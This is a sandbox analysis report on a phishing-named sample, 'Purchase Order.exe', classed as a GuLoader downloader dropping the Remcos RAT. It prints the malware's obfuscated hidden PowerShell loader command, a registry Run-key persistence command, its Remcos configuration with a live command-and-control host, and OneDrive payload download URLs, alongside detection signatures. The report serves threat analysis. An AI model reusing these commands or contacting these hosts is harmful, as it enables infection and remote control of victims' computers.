Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name:Purchase Order.exe
Analysis ID:1440304
MD5:996cd1a4008e0fca3750e9524bd13a9d
SHA1:f202d20579ba03acb804f651bf66e2ab47add4c8
SHA256:00473ae2a9e945343456d0193e1a5fe58c71776f42e747249a3c435b8ce7e1bb
Tags:exe
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Powershell drops PE file
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • Purchase Order.exe (PID: 2920 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 996CD1A4008E0FCA3750E9524BD13A9D)
    • powershell.exe (PID: 1492 cmdline: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4432 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Ultradolichocephaly.exe (PID: 6008 cmdline: "C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe" MD5: 996CD1A4008E0FCA3750E9524BD13A9D)
        • cmd.exe (PID: 6540 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 1564 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "tochisglobal.ddns.net:6426:1", "Assigned name": "abig1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "-2MBZMJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000002.00000002.2752200135.000000000B5E5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Ultradolichocephaly.exe PID: 6008JoeSecurity_RemcosYara detected Remcos RATJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Announces
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6540, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", ProcessId: 1564, ProcessName: reg.exe
            Sigma detected: Potential Dosfuscation Activity
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 4432, ProcessName: cmd.exe
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe, ParentProcessId: 6008, ParentProcessName: Ultradolichocephaly.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", ProcessId: 6540, ProcessName: cmd.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", CommandLine: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order.exe", ParentImage: C:\Users\user\Desktop\Purchase Order.exe, ParentProcessId: 2920, ParentProcessName: Purchase Order.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", ProcessId: 1492, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Purchase Order.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
            Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
            Source: tochisglobal.ddns.netAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeAvira: detection malicious, Label: HEUR/AGEN.1331786
            Found malware configuration
            Source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "tochisglobal.ddns.net:6426:1", "Assigned name": "abig1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "-2MBZMJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for domain / URL
            Source: tochisglobal.ddns.netVirustotal: Detection: 9%Perma Link
            Source: tochisglobal.ddns.netVirustotal: Detection: 9%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeVirustotal: Detection: 20%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Purchase Order.exeVirustotal: Detection: 20%Perma Link
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ultradolichocephaly.exe PID: 6008, type: MEMORYSTR
            Source: Purchase Order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb@ source: powershell.exe, 00000002.00000002.2751700296.0000000008327000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5SEA source: powershell.exe, 00000002.00000002.2746093793.0000000002B78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2749734497.000000000721D000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_00406033 FindFirstFileA,FindClose,7_2_00406033
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,7_2_004055D1
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_00402688 FindFirstFileA,7_2_00402688
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: tochisglobal.ddns.net
            Uses dynamic DNS services
            Source: unknownDNS query: name: tochisglobal.ddns.net
            Source: global trafficTCP traffic: 192.168.2.5:49715 -> 103.253.17.222:6426
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: WIFIKU-AS-IDPTWifikuIndonesiaID WIFIKU-AS-IDPTWifikuIndonesiaID
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /download?resid=7EB674A88CCF381D%21539&authkey=!AJYql7taWUIXlaI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: onedrive.live.comCache-Control: no-cacheCookie: MUID=02A1F39C44B160352D6AE03C40B16444
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /download?resid=7EB674A88CCF381D%21539&authkey=!AJYql7taWUIXlaI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: onedrive.live.comCache-Control: no-cacheCookie: MUID=02A1F39C44B160352D6AE03C40B16444
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
            Source: global trafficDNS traffic detected: DNS query: kxwbha.am.files.1drv.com
            Source: global trafficDNS traffic detected: DNS query: tochisglobal.ddns.net
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: powershell.exe, 00000002.00000002.2749734497.00000000071DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpN
            Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpW
            Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpo
            Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/t:
            Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/w
            Source: Ultradolichocephaly.exe, Ultradolichocephaly.exe, 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Purchase Order.exe, 00000000.00000000.1953867569.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2746622815.0000000004901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2746622815.0000000004901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBsq
            Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kxwbha.am.files.1drv.com/
            Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kxwbha.am.files.1drv.com/4
            Source: Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kxwbha.am.files.1drv.com/D
            Source: Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078B9000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2738950429.00000000078B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kxwbha.am.files.1drv.com/pF
            Source: Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kxwbha.am.files.1drv.com/y4mpeceYAMLWx5PShbJGMk6tKW6mQBechZgu3aTbJoU6yxz1XJ53X1sSgh53U1m7pv4
            Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/4w7
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078B9000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3214197333.00000000234E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=7EB674A88CCF381D%21539&authkey=
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405086

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ultradolichocephaly.exe PID: 6008, type: MEMORYSTR

            System Summary

            barindex
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Purchase Order.exe
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_0040310F
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Windows\resources\0809Jump to behavior
